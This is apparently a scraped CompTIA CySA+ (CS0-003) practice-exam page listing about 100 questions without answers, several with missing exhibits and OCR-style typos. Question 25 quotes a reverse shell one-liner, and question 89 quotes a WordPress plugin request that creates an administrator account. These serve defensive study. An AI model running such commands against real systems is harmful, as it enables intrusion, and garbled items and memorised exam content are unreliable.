Weekend Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: pass65

CS0-003 CompTIA CyberSecurity Analyst CySA+ Certification Exam Questions and Answers

Questions 4

A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue?

Options:

A.

Trends

B.

Risk score

C.

Mitigation

D.

Prioritization

Buy Now
Questions 5

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:

CS0-003 Question 5

Which of the following vulnerabilities should be prioritized for remediation?

Options:

A.

nessie.explosion

B.

vote.4p

C.

sweet.bike

D.

great.skills

Buy Now
Questions 6

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

CS0-003 Question 6

Which of the following best describes the suspicious activity that is occurring?

Options:

A.

A fake antivirus program was installed by the user.

B.

A network drive was added to allow exfiltration of data

C.

A new program has been set to execute on system start

D.

The host firewall on 192.168.1.10 was disabled.

Buy Now
Questions 7

While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of the piece of malicious code?

Options:

A.

Address space layout randomization

B.

Data execution prevention

C.

Stack canary

D.

Code obfuscation

Buy Now
Questions 8

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

Options:

A.

Credentialed network scanning

B.

Passive scanning

C.

Agent-based scanning

D.

Dynamic scanning

Buy Now
Questions 9

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?

Options:

A.

The finding is a false positive and should be ignored.

B.

A rollback had been executed on the instance.

C.

The vulnerability scanner was configured without credentials.

D.

The vulnerability management software needs to be updated.

Buy Now
Questions 10

An analyst investigated a website and produced the following:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 10:21 CDT

Nmap scan report for insecure.org (45.33.49.119)

Host is up (0.054s latency).

rDNS record for 45.33.49.119: ack.nmap.org

Not shown: 95 filtered tcp ports (no-response)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

25/tcp closed smtp

80/tcp open http Apache httpd 2.4.6

113/tcp closed ident

443/tcp open ssl/http Apache httpd 2.4.6

Service Info: Host: issues.nmap.org

Service detection performed. Please report any incorrect results at https://nmap .org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds

Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?

Options:

A.

nmap-sS -T4 -F insecure.org

B.

nmap-0 insecure.org

C.

nmap-sV -T4 -F insecure.org

D.

nmap-A insecure.org

Buy Now
Questions 11

A security analyst reviews the following Arachni scan results for a web application that stores PII data:

CS0-003 Question 11

Which of the following should be remediated first?

Options:

A.

SQL injection

B.

RFI

C.

XSS

D.

Code injection

Buy Now
Questions 12

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

Options:

A.

PAM

B.

IDS

C.

PKI

D.

DLP

Buy Now
Questions 13

A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface:

Which of the following exploits is most likely being attempted?

Options:

A.

SQL injection

B.

Local file inclusion

C.

Cross-site scripting

D.

Directory traversal

Buy Now
Questions 14

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

Options:

A.

SLA

B.

MOU

C.

Best-effort patching

D.

Organizational governance

Buy Now
Questions 15

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

Options:

A.

config. ini

B.

ntds.dit

C.

Master boot record

D.

Registry

Buy Now
Questions 16

Which of the following is a nation-state actor least likely to be concerned with?

Options:

A.

Detection by MITRE ATT&CK framework.

B.

Detection or prevention of reconnaissance activities.

C.

Examination of its actions and objectives.

D.

Forensic analysis for legal action of the actions taken

Buy Now
Questions 17

During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?

Options:

A.

Header analysis

B.

Packet capture

C.

SSL inspection

D.

Reverse engineering

Buy Now
Questions 18

Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development team?

Options:

A.

Increases the product price by using the implementation as a piece of marketing

B.

Decreases the risks of the software usage and complies with regulatory requirements

C.

Improves the agile process and decreases the amount of tests before the final deployment

D.

Transfers the responsibility for security flaws to the vulnerability management team

Buy Now
Questions 19

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

Options:

A.

Disk contents

B.

Backup data

C.

Temporary files

D.

Running processes

Buy Now
Questions 20

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment Which of the following must be considered to ensure the consultant does no harm to operations?

Options:

A.

Employing Nmap Scripting Engine scanning techniques

B.

Preserving the state of PLC ladder logic prior to scanning

C.

Using passive instead of active vulnerability scans

D.

Running scans during off-peak manufacturing hours

Buy Now
Questions 21

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

Options:

A.

Deploy agents on all systems to perform the scans.

B.

Deploy a central scanner and perform non-credentialed scans.

C.

Deploy a cloud-based scanner and perform a network scan.

D.

Deploy a scanner sensor on every segment and perform credentialed scans.

Buy Now
Questions 22

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

Options:

A.

Human resources must email a copy of a user agreement to all new employees

B.

Supervisors must get verbal confirmation from new employees indicating they have read the user agreement

C.

All new employees must take a test about the company security policy during the cjitoardmg process

D.

All new employees must sign a user agreement to acknowledge the company security policy

Buy Now
Questions 23

A Chief Information Security Officer (CISO) has determined through lessons learned and an associated after-action report that staff members who use legacy applications do not adequately understand how to differentiate between non-malicious emails and phishing emails. Which of the following should the CISO include in an action plan to remediate this issue?

Options:

A.

Awareness training and education

B.

Replacement of legacy applications

C.

Organizational governance

D.

Multifactor authentication on all systems

Buy Now
Questions 24

Which of the following is the most important reason for an incident response team to develop a formal incident declaration?

Options:

A.

To require that an incident be reported through the proper channels

B.

To identify and document staff who have the authority to declare an incident

C.

To allow for public disclosure of a security event impacting the organization

D.

To establish the department that is responsible for responding to an incident

Buy Now
Questions 25

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

Options:

A.

RCE

B.

Reverse shell

C.

XSS

D.

SQL injection

Buy Now
Questions 26

Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target’s information assets?

Options:

A.

Structured Threat Information Expression

B.

OWASP Testing Guide

C.

Open Source Security Testing Methodology Manual

D.

Diamond Model of Intrusion Analysis

Buy Now
Questions 27

A cybersecurity analyst is recording the following details

* ID

* Name

* Description

* Classification of information

* Responsible party

In which of the following documents is the analyst recording this information?

Options:

A.

Risk register

B.

Change control documentation

C.

Incident response playbook

D.

Incident response plan

Buy Now
Questions 28

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?

Options:

A.

CIS Benchmarks

B.

PCI DSS

C.

OWASP Top Ten

D.

ISO 27001

Buy Now
Questions 29

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

Options:

A.

Shut down the server.

B.

Reimage the server

C.

Quarantine the server

D.

Update the OS to latest version.

Buy Now
Questions 30

A company's internet-facing web application has been compromised several times due to identified design flaws. The company would like to minimize the risk of these incidents from reoccurring and has provided the developers with better security training. However, the company cannot allocate any more internal resources to the issue. Which of the following are the best options to help identify flaws within the system? (Select two).

Options:

A.

Deploying a WAF

B.

Performing a forensic analysis

C.

Contracting a penetration test

D.

Holding a tabletop exercise

E.

Creating a bug bounty program

F.

Implementing threat modeling

Buy Now
Questions 31

Which of the following does "federation" most likely refer to within the context of identity and access management?

Options:

A.

Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access

B.

An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains

C.

Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user

D.

Correlating one's identity with the attributes and associated applications the user has access to

Buy Now
Questions 32

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?

Options:

A.

Instruct the firewall engineer that a rule needs to be added to block this external server.

B.

Escalate the event to an incident and notify the SOC manager of the activity.

C.

Notify the incident response team that a DDoS attack is occurring.

D.

Identify the IP/hostname for the requests and look at the related activity.

Buy Now
Questions 33

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

Options:

A.

function x() { info=$(geoiplookup $1) && echo "$1 | $info" }

B.

function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }

C.

function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1} ').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }

D.

function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }

Buy Now
Questions 34

While reviewing web server logs, a security analyst found the following line:

Which of the following malicious activities was attempted?

Options:

A.

Command injection

B.

XML injection

C.

Server-side request forgery

D.

Cross-site scripting

Buy Now
Questions 35

A company patches its servers using automation software. Remote SSH or RDP connections are allowed to the servers only from the service account used by the automation software. All servers are in an internal subnet without direct access to or from the internet. An analyst reviews the following vulnerability summary:

CS0-003 Question 35

Which of the following vulnerability IDs should the analyst address first?

Options:

A.

1

B.

2

C.

3

D.

4

Buy Now
Questions 36

A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the following actions should a SOC analyst take first after receiving the report?

Options:

A.

Implement a vulnerability scan to determine whether the environment is at risk.

B.

Block the IP addresses and domains from the report in the web proxy and firewalls.

C.

Verify whether the information is relevant to the organization.

D.

Analyze the web application logs to identify any suspicious or malicious activity.

Buy Now
Questions 37

A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased cost.

Which of the following risk treatments best describes what the CISO is looking for?

Options:

A.

Transfer

B.

Mitigate

C.

Accept

D.

Avoid

Buy Now
Questions 38

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

Options:

A.

Reduce the administrator and privileged access accounts

B.

Employ a network-based IDS

C.

Conduct thorough incident response

D.

Enable SSO to enterprise applications

Buy Now
Questions 39

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

Options:

A.

A mean time to remediate of 30 days

B.

A mean time to detect of 45 days

C.

A mean time to respond of 15 days

D.

Third-party application testing

Buy Now
Questions 40

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

Options:

A.

Weaponization

B.

Reconnaissance

C.

Delivery

D.

Exploitation

Buy Now
Questions 41

Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?

Options:

A.

MOU

B.

NDA

C.

BIA

D.

SLA

Buy Now
Questions 42

Which of the following is a commonly used four-component framework to communicate threat actor behavior?

Options:

A.

STRIDE

B.

Diamond Model of Intrusion Analysis

C.

Cyber Kill Chain

D.

MITRE ATT&CK

Buy Now
Questions 43

An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

Options:

A.

Proprietary systems

B.

Legacy systems

C.

Unsupported operating systems

D.

Lack of maintenance windows

Buy Now
Questions 44

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?

Options:

A.

Has heat

B.

OpenVAS

C.

OWASP ZAP

D.

Nmap

Buy Now
Questions 45

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

Options:

A.

Eradication

B.

Recovery

C.

Containment

D.

Preparation

Buy Now
Questions 46

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

Options:

A.

Firewall logs

B.

Indicators of compromise

C.

Risk assessment

D.

Access control lists

Buy Now
Questions 47

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

Options:

A.

SLA

B.

LOI

C.

MOU

D.

KPI

Buy Now
Questions 48

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

Options:

A.

Offline storage

B.

Evidence collection

C.

Integrity validation

D.

Legal hold

Buy Now
Questions 49

An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?

Options:

A.

Identify and discuss the lessons learned with the prior analyst.

B.

Accept all findings and continue to investigate the next item target.

C.

Review the steps that the previous analyst followed.

D.

Validate the root cause from the prior analyst.

Buy Now
Questions 50

An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?

Options:

A.

To satisfy regulatory requirements for incident reporting

B.

To hold other departments accountable

C.

To identify areas of improvement in the incident response process

D.

To highlight the notable practices of the organization's incident response team

Buy Now
Questions 51

A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?

Options:

A.

Potential precursor to an attack

B.

Unauthorized peer-to-peer communication

C.

Rogue device on the network

D.

System updates

Buy Now
Questions 52

Which of the following explains the importance of a timeline when providing an incident response report?

Options:

A.

The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.

B.

An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.

C.

The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.

D.

An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.

Buy Now
Questions 53

A company has the following security requirements:

. No public IPs

· All data secured at rest

. No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

CS0-003 Question 53

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

Options:

A.

VM_PRD_DB

B.

VM_DEV_DB

C.

VM_DEV_Web02

D.

VM_PRD_Web01

Buy Now
Questions 54

An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?

Options:

A.

KPI

B.

SLO

C.

SLA

D.

MOU

Buy Now
Questions 55

An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations?

Options:

A.

Configure a new SIEM specific to the management of the hosted environment.

B.

Subscribe to a threat feed related to the vendor's application.

C.

Use a vendor-provided API to automate pulling the logs in real time.

D.

Download and manually import the logs outside of business hours.

Buy Now
Questions 56

A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output:

[+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx

[-] XSS: Analyzing response #1...

[-] XSS: Analyzing response #2...

[-] XSS: Analyzing response #3...

[+] XSS: Response is tainted. Looking for proof of the vulnerability.

Which of the following is the most likely reason for this vulnerability?

Options:

A.

The developer set input validation protection on the specific field of search.aspx.

B.

The developer did not set proper cross-site scripting protections in the header.

C.

The developer did not implement default protections in the web application build.

D.

The developer did not set proper cross-site request forgery protections.

Buy Now
Questions 57

An analyst views the following log entries:

CS0-003 Question 57

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial of service attempts.

which are more important than ensuring vendor data access.

Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?

Options:

A.

121.19.30.221

B.

134.17.188.5

C.

202.180.1582

D.

216.122.5.5

Buy Now
Questions 58

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user When reviewing the authentication logs the analyst sees the following:

Which of the following are most likely occurring, based on the MFA logs? (Select two).

Options:

A.

Dictionary attack

B.

Push phishing

C.

impossible geo-velocity

D.

Subscriber identity module swapping

E.

Rogue access point

F.

Password spray

Buy Now
Questions 59

Which of the following responsibilities does the legal team have during an incident management event? (Select two).

Options:

A.

Coordinate additional or temporary staffing for recovery efforts.

B.

Review and approve new contracts acquired as a result of an event.

C.

Advise the Incident response team on matters related to regulatory reporting.

D.

Ensure all system security devices and procedures are in place.

E.

Conduct computer and network damage assessments for insurance.

F.

Verify that all security personnel have the appropriate clearances.

Buy Now
Questions 60

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

Options:

A.

Take a snapshot of the compromised server and verify its integrity

B.

Restore the affected server to remove any malware

C.

Contact the appropriate government agency to investigate

D.

Research the malware strain to perform attribution

Buy Now
Questions 61

A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Which of the following best describes what the analyst will be creating?

Options:

A.

Bots

B.

loCs

C.

TTPs

D.

Signatures

Buy Now
Questions 62

An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?

Options:

A.

MITRE ATT&CK

B.

OSSTMM

C.

Diamond Model of Intrusion Analysis

D.

OWASP

Buy Now
Questions 63

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of

the following attacks was most likely performed?

Options:

A.

RFI

B.

LFI

C.

CSRF

D.

XSS

Buy Now
Questions 64

A security analyst noticed the following entry on a web server log:

Warning: fopen (http://127.0.0.1:16) : failed to open stream:

Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

Options:

A.

XSS

B.

CSRF

C.

SSRF

D.

RCE

Buy Now
Questions 65

Which of the following threat actors is most likely to target a company due to its questionable environmental policies?

Options:

A.

Hacktivist

B.

Organized crime

C.

Nation-state

D.

Lone wolf

Buy Now
Questions 66

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to

reduce risks associated with the application development?

Options:

A.

Perform static analyses using an integrated development environment.

B.

Deploy compensating controls into the environment.

C.

Implement server-side logging and automatic updates.

D.

Conduct regular code reviews using OWASP best practices.

Buy Now
Questions 67

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

Options:

A.

Hacktivist threat

B.

Advanced persistent threat

C.

Unintentional insider threat

D.

Nation-state threat

Buy Now
Questions 68

An organization discovered a data breach that resulted in Pll being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?

Options:

A.

Creating a playbook denoting specific SLAs and containment actions per incident type

B.

Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs

C.

Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders

D.

Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks

Buy Now
Questions 69

Which of the following best describes the goal of a tabletop exercise?

Options:

A.

To test possible incident scenarios and how to react properly

B.

To perform attack exercises to check response effectiveness

C.

To understand existing threat actors and how to replicate their techniques

D.

To check the effectiveness of the business continuity plan

Buy Now
Questions 70

Which of the following describes the best reason for conducting a root cause analysis?

Options:

A.

The root cause analysis ensures that proper timelines were documented.

B.

The root cause analysis allows the incident to be properly documented for reporting.

C.

The root cause analysis develops recommendations to improve the process.

D.

The root cause analysis identifies the contributing items that facilitated the event

Buy Now
Questions 71

A list of loCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost. exe. Which of the following best describes the result if security teams add this indicator to their detection signatures?

Options:

A.

This indicator would fire on the majority of Windows devices.

B.

Malicious files with a matching hash would be detected.

C.

Security teams would detect rogue svchost. exe processesintheirenvironment.

D.

Security teams would detect event entries detailing executionofknown-malicioussvchost. exe processes.

Buy Now
Questions 72

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

Options:

A.

Implement step-up authentication for administrators

B.

Improve employee training and awareness

C.

Increase password complexity standards

D.

Deploy mobile device management

Buy Now
Questions 73

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

Options:

A.

Agree on the goals and objectives of the plan

B.

Determine the site to be used during a disaster

C Demonstrate adherence to a standard disaster recovery process

C.

Identity applications to be run during a disaster

Buy Now
Questions 74

An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data before being detected and blocked. A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain access. Which of the following should the analyst perform first?

Options:

A.

Document the incident and any findings related to the attack for future reference.

B.

Interview employees responsible for managing the affected systems.

C.

Review the log files that record all events related to client applications and user access.

D.

Identify the immediate actions that need to be taken to contain the incident and minimize damage.

Buy Now
Questions 75

Which of the following will most likely cause severe issues with authentication and logging?

Options:

A.

Virtualization

B.

Multifactor authentication

C.

Federation

D.

Time synchronization

Buy Now
Questions 76

Which of the following can be used to learn more about TTPs used by cybercriminals?

Options:

A.

ZenMAP

B.

MITRE ATT&CK

C.

National Institute of Standards and Technology

D.

theHarvester

Buy Now
Questions 77

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

Options:

A.

TO provide metrics and test continuity controls

B.

To verify the roles of the incident response team

C.

To provide recommendations for handling vulnerabilities

D.

To perform tests against implemented security controls

Buy Now
Questions 78

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

Options:

A.

CVSS 3.0/AVP/AC:L/PR:L/UI:N/S U/C:H/I:H/A:H

B.

CVSS 3.0/AV:A/AC .L/PR:L/UI:N/S:U/C:H/I:H/A:H

C.

CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S;U/C:H/I:H/A:H

D.

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Buy Now
Questions 79

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Options:

A.

SIEM ingestion logs are reduced by 20%.

B.

Phishing alerts drop by 20%.

C.

False positive rates drop to 20%.

D.

The MTTR decreases by 20%.

Buy Now
Questions 80

An organization was compromised, and the usernames and passwords of all em-ployees were leaked online. Which of the following best describes the remedia-tion that could reduce the impact of this situation?

Options:

A.

Multifactor authentication

B.

Password changes

C.

System hardening

D.

Password encryption

Buy Now
Questions 81

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender Which of the following information security goals is the analyst most likely trying to achieve?

Options:

A.

Non-repudiation

B.

Authentication

C.

Authorization

D.

Integrity

Buy Now
Questions 82

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

CS0-003 Question 82

Which of the following has most likely occurred?

Options:

A.

An Office document with a malicious macro was opened.

B.

A credential-stealing website was visited.

C.

A phishing link in an email was clicked

D.

A web browser vulnerability was exploited.

Buy Now
Questions 83

After completing a review of network activity. the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily

at 10:00 p.m. Which of the following is potentially occurring?

Options:

A.

Irregular peer-to-peer communication

B.

Rogue device on the network

C.

Abnormal OS process behavior

D.

Data exfiltration

Buy Now
Questions 84

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?

Options:

A.

Cross-reference the signature with open-source threat intelligence.

B.

Configure the EDR to perform a full scan.

C.

Transfer the malware to a sandbox environment.

D.

Log in to the affected systems and run necstat.

Buy Now
Questions 85

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following.

    There must be one primary server or service per device.

    Only default port should be used

    Non- secure protocols should be disabled.

    The corporate internet presence should be placed in a protected subnet

Instructions :

    Using the available tools, discover devices on the corporate network and the services running on these devices.

You must determine

    ip address of each device

    The primary server or service each device

    The protocols that should be disabled based on the hardening guidelines

CS0-003 Question 85

CS0-003 Question 85

Options:

Buy Now
Questions 86

Which of the following most accurately describes the Cyber Kill Chain methodology?

Options:

A.

It is used to correlate events to ascertain the TTPs of an attacker.

B.

It is used to ascertain lateral movements of an attacker, enabling the process to be stopped.

C.

It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage

D.

It outlines a clear path for determining the relationships between the attacker, the technology used, and the target

Buy Now
Questions 87

A technician is analyzing output from a popular network mapping tool for a PCI audit:

CS0-003 Question 87

Which of the following best describes the output?

Options:

A.

The host is not up or responding.

B.

The host is running excessive cipher suites.

C.

The host is allowing insecure cipher suites.

D.

The Secure Shell port on this host is closed

Buy Now
Questions 88

An analyst is reviewing a vulnerability report for a server environment with the following entries:

CS0-003 Question 88

Which of the following systems should be prioritized for patching first?

Options:

A.

10.101.27.98

B.

54.73.225.17

C.

54.74.110.26

D.

54.74.110.228

Buy Now
Questions 89

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

Options:

A.

Limit user creation to administrators only.

B.

Limit layout creation to administrators only.

C.

Set the directory trx_addons to read only for all users.

D.

Set the directory v2 to read only for all users.

Buy Now
Questions 90

Which of the following would likely be used to update a dashboard that integrates…..

Options:

A.

Webhooks

B.

Extensible Markup Language

C.

Threat feed combination

D.

JavaScript Object Notation

Buy Now
Questions 91

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

Options:

A.

Hard disk

B.

Primary boot partition

C.

Malicious tiles

D.

Routing table

E.

Static IP address

Buy Now
Questions 92

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

Options:

A.

The NTP server is not configured on the host.

B.

The cybersecurity analyst is looking at the wrong information.

C.

The firewall is using UTC time.

D.

The host with the logs is offline.

Buy Now
Questions 93

A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings:

Vulnerability 1: CVSS: 3.0/AV:N/AC: L/PR: N/UI : N/S: U/C: H/I : L/A:L

Vulnerability 2: CVSS: 3.0/AV: L/AC: H/PR:N/UI : N/S: U/C: L/I : L/A: H

Vulnerability 3: CVSS: 3.0/AV:A/AC: H/PR: L/UI : R/S: U/C: L/I : H/A:L

Vulnerability 4: CVSS: 3.0/AV: P/AC: L/PR: H/UI : N/S: U/C: H/I:N/A:L

Which of the following vulnerabilities should be patched first?

Options:

A.

Vulnerability 1

B.

Vulnerability 2

C.

Vulnerability 3

D.

Vulnerability 4

Buy Now
Questions 94

An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?

Options:

A.

Static testing

B.

Vulnerability testing

C.

Dynamic testing

D.

Penetration testing

Buy Now
Questions 95

An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?

Options:

A.

Perform a tabletop drill based on previously identified incident scenarios.

B.

Simulate an incident by shutting down power to the primary data center.

C.

Migrate active workloads from the primary data center to the secondary location.

D.

Compare the current plan to lessons learned from previous incidents.

Buy Now
Questions 96

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

Options:

A.

Command and control

B.

Data enrichment

C.

Automation

D.

Single sign-on

Buy Now
Questions 97

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

Options:

A.

Wipe the computer and reinstall software

B.

Shut down the email server and quarantine it from the network.

C.

Acquire a bit-level image of the affected workstation.

D.

Search for other mail users who have received the same file.

Buy Now
Questions 98

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

Options:

A.

The lead should review what is documented in the incident response policy or plan

B.

Management level members of the CSIRT should make that decision

C.

The lead has the authority to decide who to communicate with at any time

D.

Subject matter experts on the team should communicate with others within the specified area of expertise

Buy Now
Questions 99

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system

owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to

categorize and prioritize the respective systems?

Options:

A.

Interview the users who access these systems,

B.

Scan the systems to see which vulnerabilities currently exist.

C.

Configure alerts for vendor-specific zero-day exploits.

D.

Determine the asset value of each system.

Buy Now
Questions 100

A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:

CS0-003 Question 100

Which of the following vulnerabilitles Is the securlty analyst trylng to valldate?

Options:

A.

SQL injection

B.

LFI

C.

XSS

D.

CSRF

Buy Now
Questions 101

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve

this issue?

Options:

A.

Credentialed scan

B.

External scan

C.

Differential scan

D.

Network scan

Buy Now
Questions 102

